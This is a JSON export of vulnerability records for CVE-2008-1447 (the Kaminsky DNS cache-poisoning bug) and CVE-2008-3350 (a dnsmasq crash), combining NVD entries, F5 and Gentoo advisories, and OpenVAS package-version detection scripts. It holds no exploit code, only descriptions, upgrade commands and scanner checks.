{"cve": [{"lastseen": "2021-02-02T05:35:15", "description": "dnsmasq 2.43 allows remote attackers to cause a denial of service (daemon crash) by (1) sending a DHCPINFORM while lacking a DHCP lease, or (2) attempting to renew a nonexistent DHCP lease for an invalid subnet as an \"unknown client,\" a different vulnerability than CVE-2008-3214.", "edition": 4, "cvss3": {}, "published": "2008-07-28T17:41:00", "title": "CVE-2008-3350", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3350"], "modified": "2017-08-08T01:31:00", "cpe": ["cpe:/a:the_kelleys:dnsmasq:2.43"], "id": "CVE-2008-3350", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3350", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:the_kelleys:dnsmasq:2.43:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:12", "description": "The DNS protocol, as implemented in (1) BIND 8 and 9 before 9.5.0-P1, 9.4.2-P1, and 9.3.5-P1; (2) Microsoft DNS in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2; and other implementations allow remote attackers to spoof DNS traffic via a birthday attack that uses in-bailiwick referrals to conduct cache poisoning against recursive resolvers, related to insufficient randomness of DNS transaction IDs and source ports, aka \"DNS Insufficient Socket Entropy Vulnerability\" or \"the Kaminsky bug.\"", "edition": 7, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", 
"attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 4.0}, "published": "2008-07-08T23:41:00", "title": "CVE-2008-1447", "type": "cve", "cwe": ["CWE-331"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1447"], "modified": "2020-03-24T18:19:00", "cpe": ["cpe:/a:isc:bind:4", "cpe:/a:isc:bind:9.2.9", "cpe:/a:isc:bind:8"], "id": "CVE-2008-1447", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1447", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:isc:bind:4:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:8:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.2.9:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2016-09-26T17:22:51", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "edition": 1, "description": "This security advisory describes a BIND 8 and BIND 9 vulnerability which allows remote attackers to spoof DNS traffic using cache poisoning techniques against recursive resolvers. With the exception of FirePass, the F5 products listed as **affected** in this security advisory run a version of BIND that is affected by this vulnerability. 
Although FirePass does not run the BIND software, its local DNS resolver client is vulnerable to DNS cache poisoning techniques described in CVE-2008-1447 and VU#800113.\n\nInformation about this advisory is available at the following locations:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447>\n\n<http://www.kb.cert.org/vuls/id/800113>\n\nF5 Product Development tracked this issue as CR99135 for BIG-IP LTM, GTM, ASM, WebAccelerator and PSM and it was fixed in versions 9.4.6 and 10.0.0. For information about upgrading, refer to the BIG-IP LTM, GTM, ASM, PSM, and WebAccelerator release notes.\n\nThis issue was also fixed in Enterprise Manager version 1.7.0. For information about upgrading, refer to the Enterprise Manager release notes.\n\nF5 Product Development tracked this issue as CR99135 for the BIG-IP LTM 9.6 software branch.\n\nAdditionally, this issue was fixed in hotfix versions BIG-IP-9.3.1-HF4, BIG-IP-9.4.4-HF3, BIG-IP-9.4.5-HF2, and BIG-IP-9.6.1-HF2. You may download these hotfixes or later versions of the hotfixes from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\nTo view a list of the latest available hotfixes, refer to SOL9502: BIG-IP hotfix matrix.\n\nFor information about the F5 hotfix policy, refer to SOL4918: Overview of F5 critical issue hotfix policy.\n\nFor information about how to manage F5 product hotfixes, refer to SOL6845: Managing F5 product hotfixes.\n\nF5 Product Development tracked this issue as CR102424 and it was fixed in FirePass 6.0.3. 
For information about upgrading, refer to the [FirePass](<https://support.f5.com/kb/en-us/products/firepass.html>) release notes.\n\nThis issue still exists in the FirePass 5.x branch.\n\n**Obtaining and installing patches**\n\nYou can download patches from the F5 [Downloads](<https://downloads.f5.com/esd/index.jsp>) site for the following products and versions:\n\n**Important**: If you installed Hotfix-102424, you must remove Hotfix-102424 before upgrading to FirePass version 6.0.2 or an earlier version of FirePass software. Failure to remove Hotfix-102424 prior to an upgrade may result in the FirePass Administrative Console and logon page becoming inaccessible after the upgrade. You can safely upgrade to FirePass version 6.0.3 after installing Hotfix-102424.\n\nProduct | Version | Hotfix | Installation File \n---|---|---|--- \nFirePass | 6.0.2 | Hotfix-102424 | HF-102424-1-6.02-ALL-0.tar.gz.enc \nFirePass | 6.0.1 | Hotfix-102424 | HF-102424-1-6.01-ALL-0.tar.gz.enc \nFirePass | 5.5.2 | Hotfix-102424 | HF-102424-1-5.52-ALL-0.tar.gz.enc \nFirePass | 5.5.1 | Hotfix-102424 | HF-102424-1-5.51-ALL-0.tar.gz.enc \nFirePass | 5.5.0 | Hotfix-102424 | HF-102424-1-5.5-ALL-0.tar.gz.enc \n \n**Note**: For more information about installing the hotfixes listed above, refer to the readme file on the F5 [Downloads](<https://downloads.f5.com/esd/index.jsp>) site for your version-specific hotfix.\n\nFor information about downloading software, refer to SOL167: Downloading software from F5.\n\n**Workaround**\n\nIf you enabled DNS recursion in BIND on an F5 product (excluding FirePass), you can work around this issue by disabling DNS recursion. For information about enabling and disabling DNS recursion in BIND, refer to the BIND documentation at default <http://www.isc.org/products/BIND/>.\n\n**Important**: The BIND vulnerability is only exploitable if recursion has been enabled in BIND. 
F5 LTM 9.x, GTM 9.x, ASM 9.x, Link Controller 9.x, WebAccelerator 9.x, PSM, Firepass 5.x and 6.x, and Enterprise Manager 1.x products do not enable recursion by default, with the exception of the BIG-IP LTM MSM module configured for **local bind**.\n\nTo minimize the risk for FirePass platforms, configure FirePass to use a local, secure name server for DNS resolution. Additionally, implement anti-spoofing mechanisms on your DNS servers and/or network firewalls.\n\n**Note**: You can configure the name servers in the FirePass Administrative Console on the Device Management > Configuration > Network Configuration page under the **DNS** tab.\n", "modified": "2013-03-19T00:00:00", "published": "2008-07-10T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/8000/900/sol8938.html", "id": "SOL8938", "type": "f5", "title": "SOL8938 - BIND DNS cache poisoning vulnerability - CVE-2008-1447 - VU#800113", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:04", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447", "CVE-2008-3350"], "description": "### Background\n\nDnsmasq is a lightweight and easily-configurable DNS forwarder and DHCP server. \n\n### Description\n\n * Dan Kaminsky of IOActive reported that dnsmasq does not randomize UDP source ports when forwarding DNS queries to a recursing DNS server (CVE-2008-1447). \n * Carlos Carvalho reported that dnsmasq in the 2.43 version does not properly handle clients sending inform or renewal queries for unknown DHCP leases, leading to a crash (CVE-2008-3350). \n\n### Impact\n\nA remote attacker could send spoofed DNS response traffic to dnsmasq, possibly involving generating queries via multiple vectors, and spoof DNS replies, which could e.g. lead to the redirection of web or mail traffic to malicious sites. Furthermore, an attacker could generate invalid DHCP traffic and cause a Denial of Service. 
\n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll dnsmasq users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-dns/dnsmasq-2.45\"", "edition": 1, "modified": "2008-09-04T00:00:00", "published": "2008-09-04T00:00:00", "id": "GLSA-200809-02", "href": "https://security.gentoo.org/glsa/200809-02", "type": "gentoo", "title": "dnsmasq: Denial of Service and DNS spoofing", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447", "CVE-2008-3350"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200809-02.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:61597", "href": "http://plugins.openvas.org/nasl.php?oid=61597", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200809-02 (dnsmasq)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Two vulnerabilities in dnsmasq might allow for a Denial of Service or\nspoofing of DNS replies.\";\ntag_solution = \"All dnsmasq users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-dns/dnsmasq-2.45'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200809-02\nhttp://bugs.gentoo.org/show_bug.cgi?id=231282\nhttp://bugs.gentoo.org/show_bug.cgi?id=232523\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200809-02.\";\n\n \n\nif(description)\n{\n script_id(61597);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2008-3350\", \"CVE-2008-1447\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200809-02 (dnsmasq)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-dns/dnsmasq\", unaffected: make_list(\"ge 2.45\"), vulnerable: make_list(\"lt 2.45\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-25T10:56:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "The remote host is missing an update to dnsmasq\nannounced via advisory FEDORA-2009-1069.", "modified": "2017-07-10T00:00:00", "published": "2009-02-18T00:00:00", "id": "OPENVAS:63406", "href": "http://plugins.openvas.org/nasl.php?oid=63406", "type": "openvas", "title": "Fedora Core 9 FEDORA-2009-1069 (dnsmasq)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_1069.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-1069 (dnsmasq)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to newer upstream version - 2.45.\nVersion of dnsmasq previously shipped in Fedora 9 did not\nproperly drop privileges, causing it to run as root\ninstead of intended user nobody. Issue was caused by a\nbug in kernel-headers used in build environment of the original\npackages. (#454415)\n\nNew upstream version also adds DNS query source port\nrandomization, mitigating DNS spoofing attacks. (CVE-2008-1447)\n\nChangeLog:\n\n* Mon Jul 21 2008 Patrick Jima Laughton 2.45-1\n- Upstream release (bugfixes)\n* Wed Jul 16 2008 Patrick Jima Laughton 2.43-2\n- New upstream release, contains fixes for CVE-2008-1447/CERT VU#800113\n- Dropped patch for newer glibc (merged upstream)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update dnsmasq' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-1069\";\ntag_summary = \"The remote host is missing an update to dnsmasq\nannounced via advisory FEDORA-2009-1069.\";\n\n\n\nif(description)\n{\n script_id(63406);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-18 23:13:28 +0100 (Wed, 18 Feb 2009)\");\n script_cve_id(\"CVE-2008-1447\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Fedora Core 9 FEDORA-2009-1069 (dnsmasq)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=449345\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dnsmasq\", rpm:\"dnsmasq~2.45~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dnsmasq-debuginfo\", rpm:\"dnsmasq-debuginfo~2.45~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n 
exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2020-07-21T19:26:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values\ncan make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying txidtest.dns-oarc.net (see the referenced link). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the txidtest server. In addition\nyour IP address will be sent along with the txidtest query to the DNS server running on the target.", "modified": "2020-07-07T00:00:00", "published": "2011-06-01T00:00:00", "id": "OPENVAS:1361412562310104095", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310104095", "type": "openvas", "title": "Nmap NSE net: dns-random-txid", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script:\n# Script: Brandon Enright <bmenrigh@ucsd.edu>\n# txidtest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n#\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.104095\");\n script_version(\"2020-07-07T13:54:18+0000\");\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_tag(name:\"last_modification\", value:\"2020-07-07 13:54:18 +0000 (Tue, 07 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Nmap NSE net: dns-random-txid\");\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2011 NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n\n script_xref(name:\"URL\", value:\"https://www.dns-oarc.net/oarc/services/txidtest\");\n\n script_tag(name:\"summary\", value:\"Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values\ncan make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying txidtest.dns-oarc.net (see the referenced link). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the txidtest server. 
In addition\nyour IP address will be sent along with the txidtest query to the DNS server running on the target.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-24T12:51:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2008-191-02.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:61464", "href": "http://plugins.openvas.org/nasl.php?oid=61464", "type": "openvas", "title": "Slackware Advisory SSA:2008-191-02 bind", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2008_191_02.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New bind packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\n11.0, 12.0, 12.1, and -current to address a security problem.\n\nMore details may be found at the following links:\n\nhttp://www.isc.org/sw/bind/bind-security.php\nhttp://www.kb.cert.org/vuls/id/800113\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2008-191-02.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2008-191-02\";\n \nif(description)\n{\n script_id(61464);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2008-1447\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2008-191-02 bind \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i386-1_slack8.1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i386-1_slack9.0\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.4.2_P1-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.4.2_P1-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-24T12:56:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Check for the Version of BIND", "modified": "2017-07-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:835164", "href": "http://plugins.openvas.org/nasl.php?oid=835164", "type": 
"openvas", "title": "HP-UX Update for BIND HPSBUX02351", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for BIND HPSBUX02351\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote DNS cache poisoning\";\ntag_affected = \"BIND on\n HP-UX B.11.11, B.11.23, B.11.31 running BIND v9.3.2 or BIND v9.2.0, HP-UX \n B.11.11 running BIND v8.1.2\";\ntag_insight = \"A potential security vulnerability has been identified with HP-UX running \n BIND. 
The vulnerability could be exploited remotely to cause DNS cache \n poisoning.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01506861-6\");\n script_id(835164);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"HPSBUX\", value: \"02351\");\n script_cve_id(\"CVE-2008-1447\");\n script_name( \"HP-UX Update for BIND HPSBUX02351\");\n\n script_summary(\"Check for the Version of BIND\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"NameService.BIND-AUX\", revision:\"C.9.3.2.3.0\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"NameService.BIND-RUN\", revision:\"C.9.3.2.3.0\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n 
